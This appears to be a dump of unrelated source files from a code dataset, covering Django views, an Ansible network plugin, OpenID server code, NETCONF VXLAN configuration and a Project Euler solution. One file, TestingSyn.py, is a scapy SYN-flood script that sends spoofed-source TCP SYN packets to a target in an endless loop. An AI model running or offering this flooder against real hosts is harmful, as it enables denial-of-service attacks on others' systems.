return self.get_state(), self.get_reward(), done
@staticmethod
## return states and actions dimensions
def get_dimensions():
return STATES_DIM, ACTIONS_DIM
### [debug] robot pose
def print_pose(self):
print(self.position + self.orientation)
### [debug] robot state
def print_state(self):
print(self.get_state())
| mit | 9,150,720,905,400,978,000 | 34.716667 | 116 | 0.597294 | false |
DylanSecreast/uoregon-cis-portfolio | uoregon-cis-433/Testing stuff/TestingSyn.py | 1 | 1040 | import socket
import random
import sys
import threading
from scapy.all import *
if len(sys.argv) != 5:
print "Usage: %s <TargetIp> <Port>" % sys.argv[0]
sys.exit(1)
target = sys.argv[1]
port = int(sys.argv[2])
total = 0
conf.iface = 'en1'
class syn(threading.Thread):
global target
global port
def __init__(self):
threading.Thread.__init__(self)
def run(self):
#source randomizing information
s = IP()
s.src = "%i.%i.%i.%i" % (random.randint(1,1024), random.randint(1,1024),random.randint(1,1024),random.randint(1,1024))
s.dst = target
#target information
t = TCP()
t.sport = random.randint(1,65000)
t.dport = port
t.flags = 'S'
send(s/t, verbose=0)
print "Currently attempting flooding on %s:%i with SYN packets." % (target, port)
while 1:
syn().start()
total += 1
sys.stdout.write("\rCurrent total packets sent: \t\t\t%i % total")
| gpl-3.0 | -7,891,160,487,441,633,000 | 18.259259 | 126 | 0.556731 | false |
Luminous311/gtgapp | equipment/views.py | 1 | 2156 | from django.shortcuts import render_to_response
from equipment.models import *
"""def getalltypes():
e = EquipmentType.objects.select_related()
dict = {}
for i in e:
if str(i.equipment_class) in dict:
dict[str(i.equipment_class)].append(str(i))
else:
dict[str(i.equipment_class)].append(str(i))
return dict
"""
def equipmentlist(request):
return render_to_response('equipmentlist.html',
{'equipmentlist': EquipmentType.objects.all()}
)
def equipmentclass(request, equipment_class_id=1): # Where #1 is the default, not a hardcoded value
return render_to_response('equipmentclass.html',
{'equipmentclass': EquipmentClass.objects.get(id=equipment_class_id)})
"""from django.http import HttpResponse
from django.shortcuts import render_to_response
from django.template.loader import get_template
from django.template import Context
from django.views.generic.base import TemplateView
# Create your views here.
def hello(request):
name= "Aaron"
html = "<html><body>Hi %s. This seems to have worked!</html></body>" % name
return HttpResponse(html)
#This is a non class-based view, which calls a template and sets certain arguments to stated values.
def hello_template(request):
name = "Aaron"
t = get_template('hello.html')
html = t.render(Context({'name': name}))
return HttpResponse(html)
#This is a shortcut view, where you tell it the name of the template and pass it arguments. It functions the same as hello_template.
def hello_template_simple(request):
name = "Aaron"
return render_to_response('hello.html', {'name': name})
#This is a class-based view, which takes a template name, and ... I'm not totally sure why I'd use this.
class HelloTemplate(TemplateView):
template_name = 'hello_class.html'
def get_context_data(self, **kwargs):
#Super is used to get a value from something outside of this method.
context = super(HelloTemplate, self).get_context_data(**kwargs)
context['name'] = 'Aaron'
return context"""
| mit | -1,836,965,884,439,657,000 | 34.933333 | 132 | 0.674397 | false |
trishnaguha/ansible | lib/ansible/plugins/cliconf/exos.py | 1 | 4340 | #
# (c) 2017 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import re
import json
from itertools import chain
from ansible.module_utils._text import to_bytes, to_text
from ansible.module_utils.network.common.utils import to_list
from ansible.plugins.cliconf import CliconfBase
class Cliconf(CliconfBase):
def get_device_info(self):
device_info = {}
device_info['network_os'] = 'exos'
reply = self.get('show switch detail')
data = to_text(reply, errors='surrogate_or_strict').strip()
match = re.search(r'ExtremeXOS version (\S+)', data)
if match:
device_info['network_os_version'] = match.group(1)
match = re.search(r'System Type: +(\S+)', data)
if match:
device_info['network_os_model'] = match.group(1)
match = re.search(r'SysName: +(\S+)', data)
if match:
device_info['network_os_hostname'] = match.group(1)
return device_info
def get_config(self, source='running', flags=None):
if source not in ('running', 'startup'):
raise ValueError("fetching configuration from %s is not supported" % source)
if source == 'running':
cmd = 'show configuration'
else:
cmd = 'debug cfgmgr show configuration file'
reply = self.get('show switch | include "Config Selected"')
data = to_text(reply, errors='surrogate_or_strict').strip()
match = re.search(r': +(\S+)\.cfg', data)
if match:
cmd += ' '.join(match.group(1))
cmd = cmd.strip()
flags = [] if flags is None else flags
cmd += ' '.join(flags)
cmd = cmd.strip()
return self.send_command(cmd)
def edit_config(self, command):
for cmd in chain(to_list(command)):
if isinstance(cmd, dict):
command = cmd['command']
prompt = cmd['prompt']
answer = cmd['answer']
newline = cmd.get('newline', True)
else:
command = cmd
prompt = None
answer = None
newline = True
self.send_command(to_bytes(command), to_bytes(prompt), to_bytes(answer),
False, newline)
def get(self, command, prompt=None, answer=None, sendonly=False, check_all=False):
return self.send_command(command=command, prompt=prompt, answer=answer, sendonly=sendonly, check_all=check_all)
def get_device_operations(self):
return {
'supports_diff_replace': True,
'supports_commit': False,
'supports_rollback': False,
'supports_defaults': True,
'supports_onbox_diff': False,
'supports_commit_comment': False,
'supports_multiline_delimiter': False,
'supports_diff_match': True,
'supports_diff_ignore_lines': True,
'supports_generate_diff': True,
'supports_replace': True
}
def get_option_values(self):
return {
'format': ['text'],
'diff_match': ['line', 'strict', 'exact', 'none'],
'diff_replace': ['line', 'block'],
'output': ['text']
}
def get_capabilities(self):
result = {}
result['rpc'] = self.get_base_rpc()
result['network_api'] = 'cliconf'
result['device_info'] = self.get_device_info()
result['device_operations'] = self.get_device_operations()
result.update(self.get_option_values())
return json.dumps(result)
| gpl-3.0 | 6,932,542,394,654,461,000 | 34.284553 | 119 | 0.587558 | false |
toddpalino/kafka-tools | kafka/tools/protocol/responses/group_coordinator_v0.py | 1 | 1090 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from kafka.tools.protocol.responses import BaseResponse
class GroupCoordinatorV0Response(BaseResponse):
schema = [
{'name': 'error', 'type': 'int16'},
{'name': 'node_id', 'type': 'int32'},
{'name': 'host', 'type': 'string'},
{'name': 'port', 'type': 'int32'},
]
| apache-2.0 | -967,905,041,559,764,600 | 39.37037 | 62 | 0.712844 | false |
parkr/Angels-vs-Demons | activity.py | 1 | 7979 | #! /usr/bin/python
#
# Author: Parker Moore
# Class: COMP 206 - McGill University
# Winter 2011
# Assignment 5
# Team Quad-Core Programmers
#
print "Content-type: text/html\n\n"
import cgitb; cgitb.enable()
class Page:
def __init__(self):
self.template_page = "index.html.pyt"
self.inventory_file = "inventory.csv"
self.picked_up = "nothing"
self.what_i_have = "nothing"
self.dropped = "nothing"
self.loyalty = "none"
self.points = 0
self.results = {}
self.room_complete = 0
def check_for_input(self):
# Where all the good stuff happens.
import cgi
f2 = open(self.inventory_file, "r")
stuff = f2.read().strip().split(", ")
f2.close()
output = ""
form = cgi.FieldStorage()
if not form:
# No form? Make it so.
self.picked_up = "nothing"
self.what_i_have = "nothing"
self.dropped = "nothing"
self.loyalty = "none"
self.points = 0
self.room_complete = 0
elif form['action'].value == "pickup":
# You want to pick something up. Why don't I help you with that?
self.picked_up = str(form["pickup"].value)
self.what_i_have = str(form["what_i_have"].value)
# You can get points for that!
if self.picked_up.lower() == "apple":
added_points = 10;
else:
added_points = 0;
if self.what_i_have.find("nothing") >= 0:
self.what_i_have = self.picked_up
else:
self.what_i_have += (", "+self.picked_up)
self.dropped = "nothing"
stuff.remove(self.picked_up)
elif form['action'].value == "drop":
self.dropped = str(form["drop"].value)
self.what_i_have = str(form["what_i_have"].value)
if self.what_i_have.find("nothing") >= 0:
self.what_i_have = "nothing"
else:
if self.what_i_have.find(self.dropped) < self.what_i_have.rfind(", "):
# the element must be deleted along with the comma and space
self.what_i_have = self.what_i_have.replace(self.dropped+", ", "")
elif self.what_i_have.find(",") == -1:
#the element is the only element!
self.what_i_have = self.what_i_have.replace(self.dropped, "")
else:
#the element is last in the list
self.what_i_have = self.what_i_have.replace(", "+self.dropped, "")
self.picked_up = "nothing"
stuff.append(self.dropped)
elif form['action'].value == "move":
# Used to extract information from other team members
to_get = []
self.what_i_have = ""
if form.has_key('inventory1') and form['inventory1'].value != "":
to_get.append(str(form['inventory1'].value))
if form.has_key('inventory2') and form['inventory2'].value != "":
to_get.append(str(form['inventory2'].value))
if form.has_key('inventory3') and form['inventory3'].value != "":
to_get.append(str(form['inventory3'].value))
if form.has_key('inventory4') and form['inventory4'].value != "":
to_get.append(str(form['inventory4'].value))
if form.has_key('inventory5') and form['inventory5'].value != "":
to_get.append(str(form['inventory5'].value))
self.what_i_have = ', '.join(to_get)
if self.what_i_have == "":
self.what_i_have = "nothing"
self.dropped = "nothing"
self.picked_up = "nothing"
else:
# You submitted a form... but no action?
self.picked_up = "problem"
self.droppped = "problem"
self.what_i_have = "problem"
#All pages have points. Get them.
if form.has_key('points') and form['points'].value != "":
self.points = int(form['points'].value)
# Set room_complete for Patrick's room.
if form.has_key('roomcomplete') and form['roomcomplete'].value != "":
self.room_complete = int(form['roomcomplete'].value)
# Set loyalty
if form.has_key('loyalty') and form['loyalty'].value != "":
self.loyalty = str(form['loyalty'].value)
else:
self.loyalty = "none"
# Set default readable phrase for what_i_have
if self.what_i_have == "" or self.what_i_have == " ":
self.what_i_have = "nothing"
if form.has_key('action') and form['action'].value == "pickup":
self.points += added_points # Have to do this here because only a few lines up, I set the points initially. No way around it.
# write changes to file
f2 = open(self.inventory_file, "w")
f2.write(", ".join(stuff))
f2.close()
return {'picked_up': self.picked_up, 'what_i_have': self.what_i_have, 'dropped': self.dropped, 'points': self.points, 'loyalty': self.loyalty}
def pickup_form(self):
if not self.loyalty == "none" or self.loyalty == "":
output = """
<form id='pickup' method='post' action='activity.py'>
<select name='pickup'>
"""
for thing in self.stuff:
output += "<option value='"+thing+"'>"+thing.title()+"</option>\n\t\t\t\t"
output += """
</select>
<input type='hidden' name='what_i_have' value='%s'>
<input type='hidden' name='action' value='pickup'>
<input type='hidden' name='points' value='%d'>
<input type='hidden' name='loyalty' value='%s'>
<input type='hidden' name='roomcomplete' value='%d'>
<input value='Pickup' type='submit'>
</form>
""" % (self.what_i_have, self.points, self.loyalty, self.room_complete)
else:
output = ""
return output
def drop_form(self):
if not self.loyalty == "none" or self.loyalty == "":
holding = self.what_i_have.split(", ")
output = """
<form id='drop' method='post' action='activity.py'>
<select name='drop'>
"""
for thing in holding:
output += "<option value='"+thing+"'>"+thing.title()+"</option>\n\t\t\t\t"
output += """
</select>
<input type='hidden' name='what_i_have' value='%s'>
<input type='hidden' name='action' value='drop'>
<input type='hidden' name='points' value='%d'>
<input type='hidden' name='loyalty' value='%s'>
<input type='hidden' name='roomcomplete' value='%d'>
<input value='Drop' type='submit'>
</form>
""" % (self.what_i_have, self.points, self.loyalty, self.room_complete)
else:
output = ""
return output
def go_form(self, text, fid, link):
holding = self.what_i_have.split(", ")
output = "<form id='%s' method='post' action='%s'>" % (fid, link)
for index in range(5):
if index >= len(holding):
output += "\n\t\t\t<input type='hidden' name = 'inventory%d' value=''>" % (index+1)
else:
thing = holding[index]
if thing == "nothing":
thing = ""
output += "\n\t\t\t<input type='hidden' name = 'inventory%d' value='%s'>" % (index+1, thing)
if self.loyalty == "none":
loyalty = ""
else:
loyalty = self.loyalty
output += """
<input type='hidden' name='points' value='%d'>
<input type='hidden' name='loyalty' value='%s'>
<input type='hidden' name='roomcomplete' value='%d'>
</form>
""" % (self.points, loyalty, self.room_complete)
return {'output': output, 'link': "<a href='#' onclick='submitForm(\"%s\")'>%s</a>" % (fid, text)}
def generate_page(self):
try:
f1 = open(self.template_page, "r")
self.results = self.check_for_input()
f2 = open(self.inventory_file, "r")
self.stuff = f2.read().strip().split(", ")
pickup_form_stuff = self.pickup_form()
drop_form_stuff = self.drop_form()
go_left_stuff = self.go_form('←Go Left', 'left', 'http://cs.mcgill.ca/~pcrane/teamPage/cgi-bin/show.py')
go_right_stuff = self.go_form('Go Right→', 'right', 'http://cs.mcgill.ca/~jmahen/cgi-bin/show.py')
if self.loyalty == "none" or self.loyalty == "":
self.loyalty = "none. <span class='error'>Move left to choose a side.</span>"
print f1.read() % (pickup_form_stuff, drop_form_stuff, self.what_i_have, self.picked_up, self.dropped, self.loyalty, self.points, go_left_stuff['link'], go_right_stuff['link'], go_left_stuff['output'], go_right_stuff['output'])
except Exception, e:
import traceback, sys
print
print '<html><head><title>'
print str(e)
print '</title>'
print '</head><body>'
print '<h1>TRACEBACK</h1>'
print '<pre>'
print str(e)
traceback.print_exc()
traceback.print_stack()
print "Unexpected error:", sys.exc_info()[0]
print '</pre>'
print '</body></html>'
p = Page()
p.generate_page()
| gpl-2.0 | 6,670,208,012,786,311,000 | 35.43379 | 230 | 0.624389 | false |
strogo/turbion | turbion/bits/openid/views/server.py | 1 | 6676 | from django import http
from django.contrib import auth
from django.views.generic.simple import direct_to_template
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from django.utils.encoding import force_unicode
from django.conf import settings
from turbion.bits.profiles import get_profile
from turbion.bits.openid import forms, utils, models
from turbion.bits.utils.urls import uri_reverse
from turbion.bits.utils.decorators import templated, special_titled
from turbion.bits.utils.views import status_redirect
# Maps sreg data fields to Turbion's profile if not equal
SREG_TO_PROFILE_MAP = {
'fullname': 'full_name',
}
titled = special_titled(section=_("OpenID Server"))
def is_identity_profile(request):
return get_profile(request).pk == int(settings.TURBION_OPENID_IDENTITY_PROFILE)
def identity_profile_required(view):
def _decorator(request, *args, **kwargs):
if not is_identity_profile(request):
return http.HttpResponseForbidden('Access restricted')
return view(request, *args, **kwargs)
return _decorator
def is_trust(url):
try:
trust = models.Trust.objects.get(url=url)
return True
except models.Trust.DoesNotExist:
return False
def _render_response(request, openid_response, server=None):
if not server:
server = utils.get_server()
try:
webresponse = server.encodeResponse(openid_response)
except EncodingError, why:
import cgi
return _render_error(request, cgi.escape(why.response.encodeToKVForm()))
r = http.HttpResponse(webresponse.body)
r.status_code = webresponse.code
for header, value in webresponse.headers.iteritems():
r[header] = value
return r
def _render_error(request, message):
return status_redirect(
request,
title=_('Error'),
section=_("OpenID Server"),
message=message,
next='/'
)
def endpoint(request):
from openid.server.server import ProtocolError
server = utils.get_server()
data = dict(request.REQUEST.items())
try:
openid_request = server.decodeRequest(data)
except ProtocolError, why:
return _render_error(request, force_unicode(why))
if openid_request is not None:
utils._save_request(request, openid_request)
else:
openid_request = utils._load_request(request)
if openid_request is None:
return http.HttpResponseBadRequest('OpenID consumer request required')
if openid_request.mode in ["checkid_immediate", "checkid_setup"]:
if not openid_request.idSelect():
id_url = settings.TURBION_OPENID_IDENTITY_URL
# Confirm that this server can actually vouch for that
# identifier
if id_url != openid_request.identity:
# Return an error response
why = ProtocolError(
openid_request.message,
"This server cannot verify the URL %r" %
(openid_request.identity,)
)
return _render_error(request, force_unicode(why))
# authenticate immediate if possible
if request.user.is_authenticated()\
and is_identity_profile(request)\
and is_trust(openid_request.trust_root):
openid_response = openid_request.answer(
True,
identity=settings.TURBION_OPENID_IDENTITY_URL
)
_add_sreg(openid_request, openid_response)
return _render_response(request, openid_response)
if openid_request.immediate:
openid_response = openid_request.answer(
False,
identity=settings.TURBION_OPENID_IDENTITY_URL
)
return _render_response(request, openid_response)
else:
return decide(request, openid_request)
else:
openid_response = server.handleRequest(openid_request)
return _render_response(request, openid_response, server)
@login_required
@identity_profile_required
@templated('turbion/openid/server/decide.html')
@titled(page=_("Trust decision"))
def decide(request, openid_request=None):
from openid.yadis.discover import DiscoveryFailure
from openid.fetchers import HTTPFetchingError
from openid.server.trustroot import verifyReturnTo
if not openid_request:
openid_request = utils._load_request(request)
trust_root = openid_request.trust_root
return_to = openid_request.return_to
try:
# Stringify because template's ifequal can only compare to strings.
trust_root_valid = verifyReturnTo(trust_root, return_to) \
and "Valid" or "Invalid"
except DiscoveryFailure, err:
trust_root_valid = "Discovery faild"
except HTTPFetchingError, err:
trust_root_valid = "Unreachable"
allowed = None
if request.method == "POST"\
and 'decision' in request.POST:#handle case when consumer request comes with POST
form = forms.DecideForm(request.POST)
if form.is_valid():
decision = form.cleaned_data["decision"]
allowed = decision == "allow"
if allowed and form.cleaned_data["always"]:
trust, _ = models.Trust.objects.get_or_create(url=trust_root)
openid_response = openid_request.answer(
allowed,
identity=settings.TURBION_OPENID_IDENTITY_URL
)
if allowed:
_add_sreg(openid_request, openid_response)
return _render_response(request, openid_response)
else:
form = forms.DecideForm()
return {
'form': form,
'trust_root': trust_root,
'trust_root_valid': trust_root_valid,
}
def _add_sreg(openid_request, openid_response):
from openid.extensions import sreg
from turbion.bits.profiles.models import Profile
try:
profile = Profile.objects.get(pk=settings.TURBION_OPENID_IDENTITY_PROFILE)
except Profile.DoesNotExist:
return
sreg_data = {}
for field in sreg.data_fields.keys():
try:
value = getattr(profile, SREG_TO_PROFILE_MAP.get(field, field))
except AttributeError:
continue
if callable(value):
value = value()
sreg_data[field] = value
sreg_req = sreg.SRegRequest.fromOpenIDRequest(openid_request)
sreg_resp = sreg.SRegResponse.extractResponse(sreg_req, sreg_data)
openid_response.addExtension(sreg_resp)
| bsd-3-clause | 8,777,114,912,668,532,000 | 32.38 | 97 | 0.649641 | false |
macauleycheng/AOS_OF_Example | 00-table-group-unit-test/17-L2_Overlay_Group_Flood_Over_UC_Tunnel/edit_config.py | 1 | 8084 | import pkg_resources
pkg_resources.require("ncclient==0.4.3")
from ncclient import manager
import ncclient
#due to ofconfig design problem, it need fill port feature
#but we won't use it currently.
#of-agent nexthop 2 destination user-input-dst-mac ethernet 1/2 vid 2
config_nexthop_ucast_xml="""
<config>
<of11-config:capable-switch xmlns:of11-config="urn:onf:of111:config:yang">
<ofdpa10:next-hop xmlns:ofdpa10="urn:bcm:ofdpa10:accton01">
<ofdpa10:id>2</ofdpa10:id>
<ofdpa10:dest-mac>user-input-dst-mac</ofdpa10:dest-mac>
<ofdpa10:phy-port>2</ofdpa10:phy-port>
<ofdpa10:vid>2</ofdpa10:vid>
</ofdpa10:next-hop>
</of11-config:capable-switch>
</config>
"""
#of-agent nexthop 20 destination 01-00-5e-01-01-01 ethernet 1/2 vid 2
config_nexthop_mcast_xml="""
<config>
<of11-config:capable-switch xmlns:of11-config="urn:onf:of111:config:yang">
<ofdpa10:next-hop xmlns:ofdpa10="urn:bcm:ofdpa10:accton01">
<ofdpa10:id>20</ofdpa10:id>
<ofdpa10:dest-mac>01:00:5E:01:01:01</ofdpa10:dest-mac>
<ofdpa10:phy-port>2</ofdpa10:phy-port>
<ofdpa10:vid>2</ofdpa10:vid>
</ofdpa10:next-hop>
</of11-config:capable-switch>
</config>
"""
#of-agent vni 10
config_vni_xml="""
<config>
<of11-config:capable-switch xmlns:of11-config="urn:onf:of111:config:yang">
<ofdpa10:vni xmlns:ofdpa10="urn:bcm:ofdpa10:accton01">
<ofdpa10:id>10</ofdpa10:id>
</ofdpa10:vni>
</of11-config:capable-switch>
</config>
"""
#of-agent vtap 10001 ethernet 1/1 vid 1
#of-agent vtp 10001 vni 10
config_vtap_xml="""
<config>
<capable-switch xmlns="urn:onf:of111:config:yang">
<id>capable-switch-1</id>
<resources>
<port>
<resource-id>10001</resource-id>
<features>
<current>
<rate>10Gb</rate>
<medium>fiber</medium>
<pause>symmetric</pause>
</current>
<advertised>
<rate>10Gb</rate>
<rate>100Gb</rate>
<medium>fiber</medium>
<pause>symmetric</pause>
</advertised>
<supported>
<rate>10Gb</rate>
<rate>100Gb</rate>
<medium>fiber</medium>
<pause>symmetric</pause>
</supported>
<advertised-peer>
<rate>10Gb</rate>
<rate>100Gb</rate>
<medium>fiber</medium>
<pause>symmetric</pause>
</advertised-peer>
</features>
<ofdpa10:vtap xmlns:ofdpa10="urn:bcm:ofdpa10:accton01">
<ofdpa10:phy-port>1</ofdpa10:phy-port>
<ofdpa10:vid>1</ofdpa10:vid>
<ofdpa10:vni>10</ofdpa10:vni>
</ofdpa10:vtap>
</port>
</resources>
<logical-switches>
<switch>
<id>user-input-switch-cpu-mac</id>
<datapath-id>user-input-switch-cpu-mac</datapath-id>
<resources>
<port>10001</port>
</resources>
</switch>
</logical-switches>
</capable-switch>
</config>
"""
#of-agent vtep 10002 source user-input-src-ip destination user-input-dst-ip udp-source-port 6633 nexthop 2 ttl 25
config_vtep_xml="""
<config>
<capable-switch xmlns="urn:onf:of111:config:yang">
<id>capable-switch-1</id>
<ofdpa10:udp-dest-port xmlns:ofdpa10="urn:bcm:ofdpa10:accton01">6633</ofdpa10:udp-dest-port>
<resources>
<port>
<resource-id>10002</resource-id>
<features>
<current>
<rate>10Gb</rate>
<medium>fiber</medium>
<pause>symmetric</pause>
</current>
<advertised>
<rate>10Gb</rate>
<rate>100Gb</rate>
<medium>fiber</medium>
<pause>symmetric</pause>
</advertised>
<supported>
<rate>10Gb</rate>
<rate>100Gb</rate>
<medium>fiber</medium>
<pause>symmetric</pause>
</supported>
<advertised-peer>
<rate>10Gb</rate>
<rate>100Gb</rate>
<medium>fiber</medium>
<pause>symmetric</pause>
</advertised-peer>
</features>
<ofdpa10:vtep xmlns:ofdpa10="urn:bcm:ofdpa10:accton01">
<ofdpa10:src-ip>user-input-src-ip</ofdpa10:src-ip>
<ofdpa10:dest-ip>user-input-dst-ip</ofdpa10:dest-ip>
<ofdpa10:udp-src-port>6633</ofdpa10:udp-src-port>
<ofdpa10:vni>10</ofdpa10:vni>
<ofdpa10:nexthop-id>2</ofdpa10:nexthop-id>
<ofdpa10:ttl>25</ofdpa10:ttl>
</ofdpa10:vtep>
</port>
</resources>
<logical-switches>
<switch>
<id>user-input-switch-cpu-mac</id>
<datapath-id>user-input-switch-cpu-mac</datapath-id>
<resources>
<port>10002</port>
</resources>
</switch>
</logical-switches>
</capable-switch>
</config>
"""
def replace_vtep_vtap_nexthop(sip, dip, smac, dmac):
global nexthop_ucast_xml
nexthop_ucast_xml=config_nexthop_ucast_xml.replace("user-input-dst-mac", dmac)
global vtep_xml
vtep_xml=config_vtep_xml.replace("user-input-switch-cpu-mac", "00:00:"+smac)
vtep_xml=vtep_xml.replace("user-input-src-ip", sip)
vtep_xml=vtep_xml.replace("user-input-dst-ip", dip)
global vtap_xml
vtap_xml=config_vtap_xml.replace("user-input-switch-cpu-mac","00:00:"+smac)
def send_edit_config(host_ip, username, password):
with manager.connect_ssh(host=host_ip, port=830, username=username, password=password, hostkey_verify=False ) as m:
try:
m.edit_config(target='running',
config=nexthop_ucast_xml,
default_operation='merge',
error_option='stop-on-error')
except Exception as e:
print "Fail to edit-config config_nexthop_ucast_xml"
return -1
try:
m.edit_config(target='running',
config=config_nexthop_mcast_xml,
default_operation='merge',
error_option='stop-on-error')
except Exception as e:
print "Fail to edit-config config_nexthop_mcast_xml"
return -1
try:
m.edit_config(target='running',
config=config_vni_xml,
default_operation='merge',
error_option='stop-on-error')
except Exception as e:
print "Fail to edit-config config_vni_xml"
return -1
try:
m.edit_config(target='running',
config=vtep_xml,
default_operation='merge',
error_option='stop-on-error')
except Exception as e:
print "Fail to edit-config vtep_xml"
return -1
try:
m.edit_config(target='running',
config=vtap_xml,
default_operation='merge',
error_option='stop-on-error')
except Exception as e:
print "Fail to edit-config vtap_xml"
return -1
print m.get_config(source='running').data_xml
#replace_vtep_vtap_nexthop("10.1.1.1", "10.1.2.1", "70:72:cf:dc:9e:da", "70:72:cf:b5:ea:88")
#send_edit_config("192.168.1.1", "netconfuser", "netconfuser")
| apache-2.0 | 277,871,642,250,651,300 | 33.769912 | 119 | 0.517566 | false |
euclidjda/deep-quant | scripts/build_datfile.py | 1 | 2682 | #! /usr/bin/env python3
# Copyright 2016 Euclidean Technologies Management LLC All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import gzip
import wget
import argparse
data_url = 'http://data.euclidean.com/open-data/'
data_dir = 'datasets'
s3_bucket = 'deep-quant-data'
# we should read this list from file in datasets
remote_file = 'open-dataset-2018-04-25.dat.gz'
local_file = 'open-dataset.dat'
def maybe_download(directory, filename, url):
"""Download filename from url unless it's already in directory."""
if not os.path.exists(directory):
print("Creating directory %s" % directory)
os.mkdir(directory)
filepath = os.path.join(directory, filename)
if not os.path.exists(filepath):
print("Downloading %s" % (url+filename))
wget.download(url+filename, out=directory)
statinfo = os.stat(filepath)
print("\nSuccesfully downloaded", filename, statinfo.st_size, "bytes")
else:
print("File %s already exists in %s" % (filename, directory))
return filepath
def gunzip_file(gz_path, new_path):
"""Unzips from gz_path into new_path unless it's already unzipped."""
if not os.path.exists(new_path):
with gzip.open(gz_path, "rb") as gz_file:
with open(new_path, "wb") as new_file:
for line in gz_file:
new_file.write(line)
print("Unpacked %s to %s" % (gz_path, new_path))
else:
print("Did not unzip %s because %s already exists." % (gz_path,
new_path))
def download_data():
print("Downloading data ...")
maybe_download(data_dir, remote_file, data_url)
gz_path = os.path.join(data_dir, remote_file)
datfile_path = os.path.join(data_dir, local_file)
gunzip_file(gz_path, datfile_path)
def main():
open_dataset_path = os.path.join(data_dir, local_file)
download_data()
if __name__ == '__main__':
main()
| mit | -2,462,238,654,152,892,400 | 34.289474 | 80 | 0.641685 | false |
tijko/Project-Euler | py_solutions_81-90/Euler_83.py | 1 | 3306 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Minimal path in a 80x80 matrix, from top left node to bottom right node.
Moving up, down, left, or right directions.
'''
from __future__ import print_function
import timeit
import os
try:
range = xrange
except NameError:
pass
path = os.getcwd().strip('py_solutions_81-90')
with open(path + 'euler_txt/matrix.txt') as f:
edges = [list(map(int, v.split(','))) for v in f.readlines()]
traveled = [['inf'] * 80 for _ in range(80)]
def euler_83():
x = y = 0
heap = [[y, x]]
while heap:
y, x = heap.pop(0)
traverse(y, x, heap)
return traveled[79][79]
def traverse(y, x, heap):
bounds = 80
r_vertex = d_vertex = u_vertex = l_vertex = False
if traveled[y][x] == 'inf':
traveled[y][x] = curr = edges[y][x]
else:
curr = traveled[y][x]
if x + 1 >= bounds and y + 1 >= bounds:
return
if y + 1 < bounds:
d_vertex = d_edge(y, x, curr)
if x + 1 < bounds:
r_vertex = r_edge(y, x, curr)
if y - 1 >= 0:
u_vertex = u_edge(y, x, curr)
if x - 1 >= 0:
l_vertex = l_edge(y, x, curr)
mvs = {d_vertex:'d_vertex',
r_vertex:'r_vertex',
u_vertex:'u_vertex',
l_vertex:'l_vertex'
}
if any(mvs):
mvs = {k:v for k,v in mvs.items() if k}
next_mv = min(mvs)
heap_mv = [mv for mv in mvs.values() if mv != mvs[next_mv]]
push_heap(y, x, heap, heap_mv)
if mvs[next_mv] == 'd_vertex':
traverse(y + 1, x, heap)
elif mvs[next_mv] == 'r_vertex':
traverse(y, x + 1, heap)
elif mvs[next_mv] == 'u_vertex':
traverse(y - 1, x, heap)
else:
traverse(y, x - 1, heap)
def d_edge(y, x, curr):
d_vertex = curr + edges[y + 1][x]
if traveled[y + 1][x] == 'inf':
traveled[y + 1][x] = d_vertex
elif d_vertex < traveled[y + 1][x]:
traveled[y + 1][x] = d_vertex
else:
d_vertex = False
return d_vertex
def r_edge(y, x, curr):
r_vertex = curr + edges[y][x + 1]
if traveled[y][x + 1] == 'inf':
traveled[y][x + 1] = r_vertex
elif r_vertex < traveled[y][x + 1]:
traveled[y][x + 1] = r_vertex
else:
r_vertex = False
return r_vertex
def u_edge(y, x, curr):
u_vertex = curr + edges[y - 1][x]
if traveled[y - 1][x] == 'inf':
traveled[y - 1][x] = u_vertex
elif u_vertex < traveled[y - 1][x]:
traveled[y - 1][x] = u_vertex
else:
u_vertex = False
return u_vertex
def l_edge(y, x, curr):
l_vertex = curr + edges[y][x - 1]
if traveled[y][x - 1] == 'inf':
traveled[y][x - 1] = l_vertex
elif l_vertex < traveled[y][x - 1]:
traveled[y][x - 1] = l_vertex
else:
l_vertex = False
return l_vertex
def push_heap(y, x, heap, heap_mv):
mv_coor = {'d_vertex':[y + 1,x],
'r_vertex':[y, x + 1],
'u_vertex':[y - 1, x],
'l_vertex':[y, x - 1]
}
heap.extend([mv_coor[i] for i in heap_mv])
if __name__ == '__main__':
start = timeit.default_timer()
print('Answer: {}'.format(euler_83()))
stop = timeit.default_timer()
print('Time: {0:9.5f}'.format(stop - start))
| mit | -351,287,273,247,766,900 | 25.238095 | 72 | 0.503327 | false |
tsheets/api_python | tsheets/rest_adapter.py | 1 | 2352 | from . import error
import logging
import requests
class RestAdapter(object):
def __init__(self):
self.logger = logging.getLogger('tsheets_logger')
def get(self, url, params, headers):
self.logger.debug("GET {} {} {}".format(url, params, headers))
response = None
try:
response = requests.get(url, params=params, headers=headers)
response.raise_for_status()
return response
except requests.exceptions.RequestException as e:
if response is not None:
